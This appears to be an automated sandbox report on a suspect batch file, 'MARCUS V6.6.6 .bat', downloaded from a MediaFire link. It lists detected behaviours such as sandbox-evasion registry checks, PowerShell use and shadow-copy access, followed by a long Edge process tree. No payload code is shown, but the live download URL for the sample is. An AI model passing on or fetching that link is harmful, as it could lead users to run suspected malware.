Analysis

  • max time kernel
    289s
  • max time network
    291s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250410-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20250410-en, locale:en-us, os:windows10-ltsc_2021-x64, system
  • submitted
    02/05/2025, 10:53

Errors

Reason
Machine shutdown

General

  • Target

    https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file

Malware Config

Signatures

  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 62 IoCs

    Using powershell.exe command.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
    1⤵
    • Drops file in Windows directory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3892
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x31c,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf220
      2⤵
        PID:240
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2056,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2052 /prefetch:2
        2⤵
          PID:5832
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:3
          2⤵
            PID:2368
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2552,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:8
            2⤵
              PID:3968
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1
              2⤵
                PID:5852
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
                2⤵
                  PID:2604
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5592,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:1
                  2⤵
                    PID:4584
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3464,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
                    2⤵
                      PID:524
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
                      2⤵
                        PID:2464
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8
                        2⤵
                          PID:5868
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6020,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:8
                          2⤵
                            PID:4624
                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8
                            2⤵
                              PID:4744
                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8
                              2⤵
                                PID:560
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6376,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:8
                                2⤵
                                  PID:3984
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3548,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:8
                                  2⤵
                                    PID:6116
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6240,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:8
                                    2⤵
                                      PID:4496
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6568 /prefetch:8
                                      2⤵
                                        PID:4504
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6572 /prefetch:8
                                        2⤵
                                          PID:4564
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:8
                                          2⤵
                                            PID:3980
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6152,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5788 /prefetch:8
                                            2⤵
                                              PID:4008
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:8
                                              2⤵
                                                PID:5220
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6640,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:8
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3548
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6512,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=896 /prefetch:8
                                                2⤵
                                                  PID:2860
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4808,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:8
                                                  2⤵
                                                    PID:3940
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:8
                                                    2⤵
                                                      PID:1524
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6612 /prefetch:8
                                                      2⤵
                                                        PID:5116
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=896,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1
                                                        2⤵
                                                          PID:2600
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=6380,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6796 /prefetch:1
                                                          2⤵
                                                            PID:2000
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=6932,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:1
                                                            2⤵
                                                              PID:5532
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6388,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7104 /prefetch:8
                                                              2⤵
                                                                PID:2624
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=7096,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7140 /prefetch:1
                                                                2⤵
                                                                  PID:5112
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7360,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6952 /prefetch:8
                                                                  2⤵
                                                                    PID:5508
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=6448,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7508 /prefetch:1
                                                                    2⤵
                                                                      PID:3972
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=7688,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6464 /prefetch:1
                                                                      2⤵
                                                                        PID:2836
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7828 /prefetch:1
                                                                        2⤵
                                                                          PID:3224
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7944,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:1
                                                                          2⤵
                                                                            PID:4820
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=6948,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7376 /prefetch:1
                                                                            2⤵
                                                                              PID:1780
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=8284,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7092 /prefetch:1
                                                                              2⤵
                                                                                PID:5052
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6404,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7624 /prefetch:8
                                                                                2⤵
                                                                                • Modifies registry class
                                                                                PID:2488
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7644 /prefetch:8
                                                                                2⤵
                                                                                  PID:2524
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=6428,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6584 /prefetch:1
                                                                                  2⤵
                                                                                    PID:3996
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7272 /prefetch:8
                                                                                    2⤵
                                                                                      PID:5428
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
                                                                                      2⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Checks processor information in registry
                                                                                      • Enumerates system info in registry
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Modifies registry class
                                                                                      PID:2760
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x274,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf220
                                                                                        3⤵
                                                                                          PID:3524
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1812,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
                                                                                          3⤵
                                                                                            PID:5952
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
                                                                                            3⤵
                                                                                              PID:1076
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2520,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2840 /prefetch:8
                                                                                              3⤵
                                                                                                PID:10552
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4192 /prefetch:8
                                                                                                3⤵
                                                                                                  PID:1052
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
                                                                                                  3⤵
                                                                                                    PID:5848
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
                                                                                                    3⤵
                                                                                                      PID:3332
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                  1⤵
                                                                                                    PID:1480
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                    1⤵
                                                                                                      PID:2836
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                        2⤵
                                                                                                          PID:456
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
                                                                                                        1⤵
                                                                                                          PID:1604
                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                            chcp 1250
                                                                                                            2⤵
                                                                                                              PID:3516
